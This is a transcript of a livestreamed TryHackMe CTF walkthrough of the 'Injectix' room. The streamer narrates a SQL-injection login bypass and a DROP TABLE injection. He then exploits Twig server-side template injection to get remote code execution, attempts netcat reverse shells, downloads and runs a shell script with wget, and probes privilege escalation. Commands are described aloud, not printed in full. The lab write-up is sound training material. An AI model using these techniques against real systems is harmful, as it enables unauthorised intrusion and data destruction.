looks like PHP, ASPX, JSP, HTML, JS, and apparently .log as well. It's whatever dir search does by default. Once again, I don't do anything special. I just run the basic dir search stuff. Oh, another way to find out about mail.log was to check the source code. Okay, good to know. We'll have to check that out. We have all this vendor stuff that I don't think is super helpful, besides maybe some more version information. We can check that out. Yeah, that's what I thought. More version information. We might, if we get stuck, we can come back to this and do some more digging to figure out what is being installed in the back end. But I think we have a pretty good kind of feel of things. If we jump back over to this, let me also check my vhost stuff. Vhosts are not doing anything for us, so I don't think vhosts are the way in. But here's what we have. Like if we just get our enumeration notes in place, we'll just say recon summary. We are running admin mail.log reveals credentials if a database is corrupted, which hints at SQL injection. Twig is being used to render templates, which hints at server-side template. So that's what our recon or our enumeration reveals to us. Oh, is corrupted or deleted? All right, corrupted or deleted. Post-exploitation says, does Cato have a live audit feature like Burt Pro? I don't think it does yet, not that I'm aware of. A writer said, this one is super close to Permax Hack the Box, both use Twig and Symfony. Well, sweet. Maybe it's a similar attack path. But I think we have a pretty good feel as far as our initial recon goes. Let's jump back over to our main injectix page. And let's try just some basic enumeration. We'll do test, although we know it's the dev person, dev or super admin are two users. Let's turn on queuing. Let's just submit. I want to see what this looks like on the back end. We'll do Control R to send this over to replay, and we will send the request. So we get an error, invalid email or password. Now, we know on our recon that there's a good chance something's going to be vulnerable to SQL injection. And often what's going to be vulnerable to SQL injection is a login form. So a super easy way to test for SQL injection is a single comma like that, and we can hit send. And you can see this, we got a different message. And notice, trying to get property num rows of non-object in var www html functions.php online, invalid email or password. So that's a pretty good hint that it is vulnerable, to SQL injection. And if we close out the SQL syntax with another comma, you can see it fixes the error. So we'll send again, and we get that error. So let's take that for our screenshot. And we'll drop that in our notes. And also, guys, I forgot to share, but all the notes that you see me taking when I drop this video on YouTube, I will make these notes public and share these notes in the description of the video. So if you're watching this after the fact on YouTube and you don't see these notes in the description of the video, it means I forgot. So leave a comment saying, yo, Tyler, where's the notes, bro? And I will drop all these notes. So as I'm working on these notes, these will be available to anyone and everyone who wants to look them over themselves or use them for your own note-taking strategy. So I'm going to say this. We'll go SQL injection. All right. We can see that there. The picture's small, but I think if you double click it, yeah, it'll pull up the full picture. So we can see that we have SQL injection here. Now there's a few different ways that we can test it. Let's go ahead and go. I want to show you guys the power of Cato. So let's search for, like, I don't know. First, why is my search engine DuckDuckGo? I mean, as much as I like DuckDuckGo. Payloads, GitHub. We'll check out a few of these. Payload all the things. That's one that's usually helpful. Let's check out payload all the things. What do we got? Payload all the things. MySQL injection. Oh, I just want a list that I can just freaking spam it. You know what I mean? All right, let's check out this intruder. We already detected it, so let's do exploit. And how about auth bypass? Let's start with these. So we'll just copy these, jump back over to Cato, change this back to test. I'm going to do Control M to send this over to automate. Now Burp Suite Pro has something called intruder. Oh, I thought I did that. Cato has something called automate, but here's the cool thing about Cato. You are not rate limited. So on intruder, you're super rate limited. It's not even realistic for what you can do unless you use like intruder Pro, or I don't remember what it's called, where you can script it out with Python. And Cato, even the free version of Cato, you're not rate limited at all. So I'm going to mark test as my entry point, and my payload, we'll just do a simple list, paste in my payloads there. I think it will automatically URL encode it for us, and let's just turn our number of workers up to like 30 because YOLO. We'll see if we break the app. Don't do that in a real pen test. Yeah, Turbo Intruder. That's what it is. Let's go ahead and run this and see if we can get any hits. Now what we're looking for is a difference in length, which we have a few, difference in length, or a difference in status, right? So let's check this out. We have some different lengths, which is just that message. So 333 isn't going to be super helpful for us. What are some other lengths we have? We have a 451. And actually, it looks like this payload logged us in. Status, login successful. So we were able to do auth bypass via SQL injection. Let's go ahead and grab a screenshot of that. I'll go like this. If it would hurry up, like come on. Thank you. Highlight that box and this message right here. Copy, jump back over to our notes, and we will say auth bypass. And I also like to drop the payload here in plain text so it's easier to use later on. So this is the payload that successfully bypassed authentication for us. There we go. All right, let me look at chat. Oh, Netflix dropped a SQL login bypass from Hacktricks. Nice. I bet it has that similar payload. General said OWASP Zap has no rate limit either. Gotcha. Like, I've never really used OWASP Zap, guys. I've used it maybe once or twice. The only reason I don't use OWASP Zap, and this is going to sound very shallow, I don't like the way it looks. Whenever, like, let's look at it real quick. If I go to images here. Maybe it's gotten better. Like, it reminds me, guys, of MySpace. Like that. That's all I think of. When I open it, I'm like, I feel like I'm in early 2000s MySpace, and I need to modify the HTML on my MySpace and make sure I have automatic music playing when people land on my MySpace page. That's literally the only reason I don't use OWASP Zap. It's because of the looks. That's how shallow I am. I like, just look at Kato. It looks better than Burp. It just looks so clean and just like pretty, right? For lack of a better term. So that's why I use Kato. Anyways, we can go ahead and take our payload and just drop it in here because I didn't realize I was still proxying this request. Was it here? Let's grab our payload, copy it, jump back over to Kato and drop it our username here like so, and we'll forward that request, forward, and we'll just turn off queuing. We should be logged in now. And we are. Okay, cool. Check out chat. Let's see if I missed anything. It does have those nostalgic vibes. Or it's just old, yeah. I mean, I think it's a solid tool because Zap, OWASP Zap has active, like, auditing, right? When you're visiting websites, it's looking for vulnerabilities and you don't have to pay for it, unlike Burp Suite Pro, I'm pretty sure. A Rider says, does OWASP have a dark mode? I'm not sure. Someone let me know who uses OWASP if it has a dark mode. Hi Tyler, please share a Try Hack Me machine created by Amoeba Man. Oh, Amoeba Man, which you mentioned in the OSCP video. Dude, I don't remember what machine I mentioned. The OSCP video was like 2 years ago. I'm sorry, dude. I'd have to rewatch my video to figure out what machine you're talking about. I'll try to watch that later and get back to you. But I don't even remember what I talked about in that video, to be honest. Oh, Posser Syndrome asked a good question. He said, do you use the live audit of Burp Pro in real life pen tests? I do, but to be honest with you, I would say 99% of the findings that Burp Pro tells me are false positives. Almost all of the vulnerabilities I find in real pen tests are manual finds. Like automatic scanning does not find it. Even things like cross-site scripting, Burp Pro, from my experience, is a pretty terrible job at finding it with the automatic live audit. So like, it's not as magical as I thought it was before I had a Burp Pro license. A lot of what I do can be done with Community Edition of Burp, for real. All right, let's see what we have here. So we have welcome dev. So we know that we're logged in as the dev user. We're not logged in as the super admin user. And I'm guessing the super admin user up here, wherever they are, the super admin user, he probably logs in on the admin login form, whereas dev has access to this login form right here. So I don't know if the admin login form is also vulnerable to SQL injection. Maybe we can try that if we get stuck, but we have some stuff here and we can edit things. So let's just change this to 23. We won't break the request yet. Update. Oh. Update. There we go. Drop that over to replay and hit send. And it's found. And what the frick is this? It's like a URL encoded thing saying A break line, notice, undefined variable country in var www.html, edit leadership board online. All right, well, that's interesting. So what we can do now is we can fuzz, right? We can fuzz this, like, for this, can I do, like, please subscribe? Will it take text like that? And it would appear it fails. We can also try our server-side template injection to see if we can get anything back on that. And that also fails. We can try to like URL encode it. I don't know if that would make a difference, but we can try it. And send that. Okay, that doesn't work. We can try, let's change it back to 23 so we have it working. We can try adding that. Single quote. And we just get an error updating data. We can try like bar for command injection. Just trying to figure out like what, is there any characters that don't break this? Whoops, we have to do AMP, we have to URL encode it. Nope, that breaks it. Oh, did it not go through? Oh, that allowed it. I might, is it drop table users? I might have my syntax wrong here. Let's go over to this. I want to drop that. And we'll turn on queuing just because I want to see what my payload looks like right now. Undefined rank? What? Did I break something? Do I have to oh no, we're back into dev. USA, China. All right, let me look at my, is it drop table users, drop users table, something drop? Try this. Drop table users, right? Drop table statement removes a table and its data permanently from the database. MySQL can remove multiple databases. So create table, second use drop. Oh, maybe I just need to close out my SQL command. Drop table users. Let's just try that real quick. Oh, I didn't do the syntax right. I did drop users. Okay. So let's do drop table users and then do that to close it out. Okay, did it work? I'm stuck in an endless thing. All right, let me go back. Let me look at my syntax. Did I do something wrong? Oh, maybe it's a lowercase users table. Does that do anything? Drop table users. Drop table users. Maybe it worked? Like, I don't... Should I see a different message? Oh! Okay. There you go, ladies and gentlemen. Let's grab a screenshot of that. So I didn't... When I was poking at this on Friday, I never got to this point. Let's just do this. Drop it like it's hot. We dropped our database table, and as proof of that, we have this screenshot right here. Come on. Bruh. Why? You know what? Fine. Fine. I don't know why my computer's being slow, but we'll take it. We'll just drop that there. Injected server is running to restore. Please wait 1 to 2 minutes. And it's restored. We can probably log in. Checking out chat. Oh yeah, Nephilis had it. Drop table users. We have time for questions. We do. I'm look over at YouTube, see what I'm missing. Oh, I'm missing a few comments on YouTube. Let me scroll up. OP Kevin said, I'm a bit concerned here. This room is like we have to protect from being inducted or we have to inject. Yeah. Jesse Johnson, what is up, dude? Said, grinding on some blue team stuff. Got to keep my pen testing skills sharp. No better way than Tyler. Thank you, dude. Some of us are here, Team SC. Yeah, guys, so for the Team SC people, guys, I will be on the panel on Friday. Jerry always invites me, but it's early in the morning for me. I'm usually not awake. And so I'm waking up early on Friday to hang out with Jerry and the rest of the Simply Cyber team on the panel. So if you do not watch the daily morning brief show or daily morning threat brief, daily cyber threat brief, I don't remember the name of it, on Simply Cyber's YouTube channel, watch it on Friday. I'm going to watch the full show. Then I'll jump on the panel and hang out with you guys. So make sure you join for that. It'll be the last stream, at least for me, until Defcon is Simply Cyber. What up, Stephen Upshaw and OG from Try Hack Me? Good to have you here. Hey, Tyler, I'm AV. Love your channels, plural. You probably should add a scripture quote snippet at the end of every hacking vid. Hey, thank you for the nice comments. Malware Combat said, I'm working on an MFA ebook brochure right now and learning a lot, not just about MFA, but documenting. Awesome. Oh, a rider saw what I was doing. Move the last that as you're injecting the second set. Well, I didn't have to. Looks like it worked. Did you take new screenshot application? No, Flameshot is what I always use. Poster Syndrome said, I just got hired as a junior pen tester. Tips on how to not be overwhelmed. You know, I can probably actually provide some decent tips because where I work, we just hired 3 new people and I've been the person training primarily 2 of them. The first person, I was actually on vacation when they got hired. So I've been training junior pen testers. This is their first pen testing job. My best advice on not being overwhelmed is hopefully you work at a place where they encourage questions. So I've done a lot of, or these new pen testers have done a lot of shadowing with me. I just make myself available to answer any and every question that they have and just guiding them through the process. I would just focus your first few weeks is just to learn the company, learn some of the tools, learn some of the process, and relax, right? Like, you made it, dude. Congratulations on getting hired as a pen tester, the job that so many people want and yet so many people have a hard time breaking into. So first, just congrats on that. And the company hired you because they see something in you that they need. So don't let that imposter syndrome tell you that you're not supposed to be there. If they hired you, it means you are supposed to be there. So take it, one step at a time. Hopefully you can find someone who's a little more senior that you can partner up on in shadow with. I think where I work, we do a good job of that. And it's been fun being able to train the new pen testers and just giving them some of my background. A lot of it's kind of like what I'm streaming. Instead of me doing a Try Hack Me machine, we're doing a real web app, and I'm just walking through what I check and the things I see. We also have good documentation. So a lot of it is dependent on the team that you are on and the people on the team. But that would be my advice for you. And good luck. If I can help, let me know on Discord. All right. We have this again. Let's log out here. And because we broke the database, we should be able to log in as an admin, right? Super admin or something at Injectix, is that the name? So here we go, super admin at Injectix at THM. We'll just copy that and dev password 123. Same password I use for my bank account. I don't know how they know that. So dev password 123. Okay, if I could look at a screen and not forget what it says the moment I look away from it, that would be a good starting point. Let's just copy it. Oops. What did I do wrong? Oh, I swapped the passwords. You guys notice that? Super admin is super secure password. So let me just fix that real quick. I didn't even realize I did that. There we go. Super secure password 101. So let's try that. So super admin at injectix.thm. There it is. And the super secure password 123. Boom. And we are logged in, and we have the first flag. Amazing. Congratulations, Tyler. Thank you, Tyler. I appreciate the congratulations. What is the content of the hidden text file in the flags folder? Well, we still haven't seen server-side template injection. Is there anything else I can do that I couldn't do before? Or I can update profile, dashboard. So this is the same thing I had before. What's profile do? So here is some input that we can mess around with. So here we can try some template injection. And I do this on a real pen test too. Anytime I see an input field, and especially if it's reflected, I will try server-side template injection. I'll try cross-site scripting. Let's submit. Profile updated successfully. What if I go back to home? Profile. Okay, let's update our first name because that's what's being reflected on the other page. Submit. Home. And we have server-side template injection. So let's take a screenshot of that if my screenshot tool wants to work. If my screenshot tool wants to work, thank you. Profile. So that shows how at least do it. Often when you discover something like server-side template injection, although it's going to be out of scope for this room, but it would be in scope for a pen test, you can likely get both cross-site scripting and HTML injection. I always test with basic HTML first, and then I see if I can upgrade that to cross-site scripting depending on what filters you have to bypass. So I'm just curious. Obviously out of scope, but there we go. So we also have HTML injection. I bet we can turn that into cross-site scripting as well. And we do. So I also have cross-site scripting, stored cross-site scripting on the page, because if you inspect this, inspect it again, you can see right here, it's putting my script directly onto the page. So we have HTML injection, cross-site scripting, as well as in server-side template injection, all on that page. But because we have server-side template injection, what we can do is probably fuzz this, kind of like what we did with the other thing. So let's try an intercept here. We'll turn on intercept up there. We'll jump back to our page. We'll hit submit. And go here. Actually not replay. I want to do automate. Oh, did I not send it? Am I doing the wrong hotkey? There we go. And we want to highlight our name, of course. Well, I guess this won't really show us because, like, it's not reflected on that page. So this is more going to be a manual process, I guess. So let's turn off intercept here. And then we'll play around with the replay on here. And we'll be able to see the changes reflected in the dashboard. That's how I'm thinking in my head. So let's go ahead and do some digging into what we can do with server-side template injection, specifically Twig. And I know we can do quite a few things. Do I need to add an hour? Nope, I'm still good on time. So let's do Hacktrix SSTI, which you can actually see my link right there when we were looking at it earlier. And let's do twig. All right. So refer to current application, get info, file. Can we do file read? Just out of curiosity, let's see if this works. I don't know if I have to URL encode that or if it'll just be fine like that. Unknown file excerpt filter and string template at line 1. Okay. So we can't do file excerpt. That's fine. It was at least worth a try. Execute code is really what we want to do. Here's FTP. Here's ID. Here's who am I. Can I run this ID command? Let's copy that. Jump back over to Cato. And let's try this ID command here. And we'll send. All right, jump back over to dashboard. Tag import is not allowed. Okay, so we have some restrictions on this. Let's look back over to what we have. So those ones aren't going to work. What about something like this? Send, dashboard, refresh. The callable passive filter must be a closure in sandbox mode in string template. I don't know what the frick that means, but all right, dude. Surely one of these will work. I don't think these will work because it was similar to before. Here's one that's a little bit different. We can try this. One of these is bound to work. Or I'm just going to just fuzz this thing until I get it. System has been disabled for security reasons. Notice array to string conversion, blah, blah, eval code on line 40, array. So the system command has been disabled for security. That's fine. You should probably fix your server-side template injection too for security purposes. Let's see what we have here. Whoops. All right, so we have twig basic injection, template format, arbitrary file reading, twig code execution. Like, does self do anything? Let's try that. Send, dashboard. Okay. So I don't think that will do it. That won't do it. These are all ones that we've done. What about sort and combining with pass-through? What do you mean by that? I obviously need to get better at server-side template injection. I'm like, usually this works, and I'm just like, all right, sweet, reverse shell. Let me try this one. I think I already did that one. Let's find out. All right, so Nefos says this, ID with pass-through. Let me try that real quick. Oh, I see what you did there. Okay, let's try that. Boom. You're a freaking genius, Nefos. All right. So we have RCE. Passed through before work, but was in a sandbox. Good catch. Yeah, I didn't even catch that. Good catch. Oh, let's just drop that in a code block. There's that. For some reason, my screenshotting, my VM is just like, I can't take screenshots. I don't know how. Can I just get a screenshot of this? I have to like wait a full second. 1 Mississippi, 2 Mississippi. Come on. Are you serious? There. All right, there we go. I want to at least get a screenshot of that RCE. So now there's a few things that we can do. They said, where did they say the flag was? We could just get a full reverse shell, I would think. Was it kind of the hidden text field in the flags folder? But can I just do something like, actually don't even think I need to do that. Oh yeah, I do. All right, there's a netcat. So can I do like ten dot, oh, 10.13.46.224 plus, is it dash E? I don't know how I'm forgetting the syntax on this, but I am. Oh, you know what? We can use our handy dandy hack tools. Let's just make this full screen. There we go. And our IP is 10.13.46.224. And then we can see all of our different reverse shells that we can play around with. Oddly enough, they don't have the very simple netcat reverse shell, but we have this one that we could probably make work. Okay. $1337 is our port. Let's just give this a shot. And send that beast. And it did not work. All right, let me just try a basic netcat shell. We can also do like base64 encode it, which is just have it on here. PHP, TTY. What do we all got here? Cross-site scripting, SQL injection, data encoding. Oh no. It would be nice if it had the character safe things. I'll show you what I'm talking about. Hacktrix reverse shell bash. All right. Short and bypass. Oh, this might work as well, but symbol safe shell. Here is what I'm thinking. You need a more stable shell, so encode the shell like so. So let's go ahead and do this. We'll grab this, open up our terminal, and we'll go ahead and code our shell, but we will of course drop our IP in here, so 10.13.46.224, like so. And then we will get that, and if we go back over to shells, we might be able to do this command, just this echo command. Let me just first make sure this is back to working. I didn't break that. Oh, I have a typo on my IP address? Okay, thanks for telling me before I try it. 10.13.46. Good call. Thank you. I went insane wondering why it's not working. It still probably won't work, but at least I'll know it's not because of that. can manually URL encode most of this. Maybe it would have been easier for me to do it there. All right. And I need to update it though with my string right here. Back to Cato. Nope, not the plus though. We want to keep the plus in there. Like so. All right, and finally, start a listener and let's see if this works. Nope, I don't think it did because it didn't. Oh, I probably have to go to the page to trigger it. So that didn't work either. How about this way? Right? Always have more than one way to do it. I have a few ideas here. Oh no. Oh no, there it is. Okay. So we have this. We have two users, QA and THM and Ubuntu. Right? So we can do ls. I don't know if QA is a real user. No. We probably aren't supposed to actually get one of those users. They seem like they were used just in testing. Oh. What about bash netcat IP port e bin bash? That's what I was trying to do, dude. I can't remember the syntax. I will do that, but I want to test something real quick. See if I can do this in a slightly unintended way. Nope, I can't. I can't write to it. Oh, wait, no, that should have. Oh, well, my mouse just got really fast. Let me fix my mouse. There we go. All right, let me refresh this. Oh, no, I'm not seeing anything there. Why am I not seeing anything? That was working before, wasn't it? Didn't I see? Oh, gosh, Tyler, do you not know how Linux works, dude? Freaking add a slash, homie. What a noob. Oh, no, I can't. So I was thinking if I could write to Ubuntu, I could write an authorized key and then update or upload my authorized key to it. But let's just try netcat because we know netcat's on the machine. That's what I was trying to do in the beginning. So we'll give that a shot. User bin, I think we can just do this. User bin netcat 10.13.46.224. We'll just say 444 e bin / bash like so. We have our listener set up. Dang. Nothing. Well, we have file read. And we know it's in this flags folder. And really all it's asking is for the flag value. So technically I can do it this way. Oh, do I have to call bash? Okay, cool. Well, let me grab the flag and then we'll see if we can get a reverse shell. But this is another way that we could do it, just by doing file read on it, since it doesn't require us to actually have a shell. This should give us the flag. Yep, just like I thought. And now let's go back. Now that we have solved the machine, we'll see if we can get an actual stable shell on it. But there's our final flag. Submit, and congratulations, we have completed the room. Share this with my friends. You are my only friend, so thank you all for completing it with me. But let's see if we can get a shell on this. Is my listener still listening? Yeah. Okay, does that syntax look correct to you guys? Let's try that. No. It's not wanting to give me a reverse shell. I mean, I at least have the flag. Like, I've technically solved the machine, so this isn't required. But this also shouldn't be this hard. We could just upload our own shell, could we not? Oops. Like something like that. And then if we just grab a very basic shell out of hack tools, like this one right here. I didn't even realize I didn't create a room for this. That'll be 1337. If all else fails, you just sudo that beast, host a basic Python web server on port 80, and can I do this? All right, and it got the shell. So now, what if I go ahead and change the shell? Whoops. One of these times, guys, I'm going to get this. Oh, I had to... What are you doing with your life, Tyler? My goodness. I have all these random slashes that shouldn't be there. So what if I just go directly to the path since it's executable, or it should be? Wow. Why does that not work? Is my file even there? No, that's why it doesn't work. My user can't write to temp. It would appear. Come on. What is going on with this machine? I think I need to like remake my VM or something. It's being crazy slow, and I have a lot of RAM and stuff on this computer, so it shouldn't be slow like this. So it's not in temp. So it didn't even grab my tool, but I should be able to also execute it just like in memory. Maybe not. I might just be okay with getting the final flag and not caring about this. I mean, I've completed the room. I want to go to bed. Is BusyBox on the system? I don't know. Like, what am I missing for this? Everything I've done generally works on all the machines. The character safe payloads, the netcat payloads, bash payloads, downloading the file to temp usually works. Like what's on it? Document, I mean, this is just a CTF machine. I know it is, but it is technically, we technically just need the flag, like, which I did. But I don't get why I can't upload. Was my syntax incorrect? Hold up. I think my wget syntax was incorrect now that I'm thinking of it. Let me try this. .13.46.224 shell.sh -o. Let me try this here. No, okay. There we go. All right, I think my syntax is incorrect. So let's try this instead. Send. Refresh. See if it downloaded, which it did. All right, we have the GET request. And now, what if I go back to this, and we'll just say on temp.shell. All right, and now, just for a sanity check, let's try to cat it out. Oh, you know what? You need to, I think we have to actually go to it to execute. So I need to go like this. And then we can do that. Hey, there it is. There is our shell that we want. We'll set up our listener there. Go over to this. We might be able to just go directly to it since I made it executable. freaking did it. When at first you don't succeed, you just keep banging your head against the keyboard until you get what you want. Now we have an actual shell, and we could have got it this way too. Right? It just took me a second to think through what I was missing. And just that little bit of sanity check, I was like, oh, I think my wget flag was incorrect. And kind of a lesson is you saw me test it locally on my system. That's always something super helpful to do, because then you can make sure it's going to work when you get on it. So I know I'm not supposed to be able to elevate my privileges. But do you think we can? So we have access to the Ubuntu user with the SSH in here, and we get access denied. What's cron output? Oh, okay. You don't want to do that. Sage. What other users do we have here? We're going to see if we can elevate our privileges on this machine, even though that's completely out of scope. Because, you know, why not? We have, it's 11:13. Let's give it like 15 minutes of trying to elevate our privileges. Let's find out what we can do. I'm going to take over this machine. I'm coming for you, try hack me. I'm sure they probably patch any unintended privilege escalation methods, but we're gonna give it a shot. Ooh. Is this actually a vulnerable version of sudo? I sure hope it is. Well, we don't need that. Where's, oh, you know what else we need to do, guys? Before we forget, let's give ourselves an hour. They have succeeded in obtaining complete privileges by exploiting the vulnerability on 1.8.31. That's what we have, right? I don't think our user is going to have the permissions to do this. I guess let's look through if there's anything else here. Possibly PwnKit. Typical AWS stuff for try hack me. You know, there's probably not going to be too much here since they didn't intend for us to pwn it this way, but you never know. I'm not seeing much that is super helpful for us. No interesting capabilities, it looks like. We have all the PHP my admin stuff, but I don't think it's vulnerable to that. How do you know when you should stabilize your shell or not? You usually should stabilize your shell. Just because, like, I'm just digging in, I'm not, but I can show you how to stabilize it. That Hacktricks browser extension is amazing for that. So if we just go to here, we can kind of follow these steps right here. So if we just quite literally copy this, go to this, come on. And now we're going to Control Z. And then copy this. And then copy this. And now we have a stable shell for our enumeration. Is that what I'm trying to do? I don't know if it's going to be vulnerable to any privilege escalation unintended. Like, unless they accidentally left something in the code, but I highly doubt that. Okay, we have the root password for MySQL. All right, select everything from, all right, it's use database, use PHP my admin, show tables. Oh, there's not much in here at all. There's no user information. Select everything from PMA. How about user config? So we do have the root user and the user config. All right, we have the back test, but we kind of know what's already in there. The rest of this isn't that interesting, but we might be able to do some interesting stuff with MySQL running as root. Let's see what we can find. Basic enumeration, we're already connected, we're already connected, we're already connected. You need file privilege to read and write to files. We can do show grants, I guess, and see what privileges we have. Do we have file write at all? I don't think so. Kind of file the MySQL, ask the client to read it and send the client. Then if you can tamper, blah, blah, note that this is the behavior using that. Notice the local word, because without local, you can get that. Loading local data is disabled. This must be enabled on both the client and server sides. Yeah, I suppose it would only matter if MySQL itself is actually running as root. That's going to be the only thing that's going to be helpful for us. But, I mean, maybe it is. Let's find out. Oh no, it's running as the MySQL user. If it was running as root, we'd be able to execute commands as the root user if we could abuse it, but it's only running as the MySQL user, so it's not going to actually be helpful to us. All right, guys. I'm going to call it a night and get out of this rabbit hole that I am on. This will be the end of the standalone video for YouTube, where we really did a deep dive into the injectix room. Solved it a few different ways. Like, we got the server-side template injection. I banged my head against the wall because I apparently don't know how to use the Linux command line or wget, and instead I just read the file. But then I remembered, oh shoot, I need to use wget with the -o flag in order to make it work. And with that, we were able to get a reverse shell, stabilize our shell, and even did some post-exploitation, looking at linp, seeing if we might be able to elevate our privileges, looking at MySQL. Of course, all of that was out of scope for the CTF, but I think it's fun once you solve a machine to go beyond the root, is what they call it. I think 0xDF on Hack the Box machines calls it beyond the root. So we did a little bit going beyond the root, seeing what we could discover. Hope you found this walkthrough helpful on your own journey as you dive into this. So thank you all for watching, and I will see you in the next one. All right, now I'm just on with all of you guys, and let's, dude, Blaze Bits, I was gonna come raid you. What are you doing with your life, homie? Oh, dude, Blaze Bits, I just finished a machine and was just, I'm calling it a night, and I was like, I'm gonna go raid someone, and I figured, hey, BlazeBits is usually on at this time, I should go raid BlazeBits. And literally as soon as my stream is done, BlazeBits jumps in with the raid. I do want to say hello to all the raiders. Welcome to my Twitch channel. I generally do on-prem pen testing with like Try Hack Me and Hack the Box. I do a lot of cloud stuff, AWS and Azure pen testing, and I'm on stream occasionally, at least once a week. But my main channel, I'll just do some self-promotion real quick. We just solved the latest Try Hack Me machine injectix, but my main channel is not Twitch. It's actually YouTube. So if you go to YouTube, Tyler Ramsby, you can see all my videos here. You can see I have over 400 videos, a lot of really in-depth walkthroughs on various machines. What's probably different between me and some other content creators is I don't prep ahead of time. I just dive into it completely live and give you my full thought process, methodology, frustrations, and all that good stuff. But this is my YouTube channel. If you want to support me, I encourage you to subscribe here. I think you will enjoy the content. And also want to say, as you can see the video here, I will be at Defcon. So if any of you are going to be at Defcon, would love to meet up, grab drinks, hang out in Vegas, get into some hacker shenanigans. If you're going to be at Defcon, my community, if you want to join it, is Hack Smarter. So if you go to hacksmarter.org, you can click there to join our Discord. We do weekly goal meetings. We do career coaching. All of it's completely free. I don't believe in paywall. So all the content I create on YouTube, Twitch, Discord, whatever it is, everything is free. All my coaching is free. It's just a way of giving back to the community. I'm not trying to get money out of people. I just truly want to give back. What box are we doing? We were doing Infectix on Try Hack Me. Right here, the latest machine. We literally just finished it minutes ago, but it's the last challenge machine that just came out right there from 1337 RCE. Was a fun machine. Some SQL injection, server-side template injection, really testing some web app pen testing skills. But guys, once again, I am so sorry that y'all are joining the raid right now, because I need to go get these videos ready to go and then jump off. But let's see. I don't know who Oaf Ja is. Let me see who this is. Let me get this pulled up. I'm going to pull it up on my other screen. Copy link. Drop it here. Oh, he speaks, it looks like, Spanish. Let me just see if there's anyone else streaming. See if there's anyone we should raid. Otherwise, it looks like just me and BlazeBits were the ones hanging out and hacking stuff. If another streamer there. Hey, there's that cool guy, Hack Smarter. All right, let's Let's check out this person.
Energy and hydration critically low. Find energy now.
All right, cool. So it looks like I think I've rated this guy before. I believe he speaks Spanish, obviously, but let's just show him our support. Blazeman says we are the normal night owls. Exactly, dude. We're the cool people who stream at night. But let's raid this person just to show him some support as he works through. It looks like the Hackers Lab. That looks like fun. So I'll hang out and chat there. The raid phrase is hack smarter, not harder. For those of you over on YouTube, if you want to join the raid, jump over to Twitch and you can join it. But let's go ahead and raid this person, eWar01. I will drop it over here. Join in the raid, my friends. Okay, so once again, hack smarter, not harder. For those of you watching the live stream on the other platforms, I will see you later. For those on Twitch, I'll see you over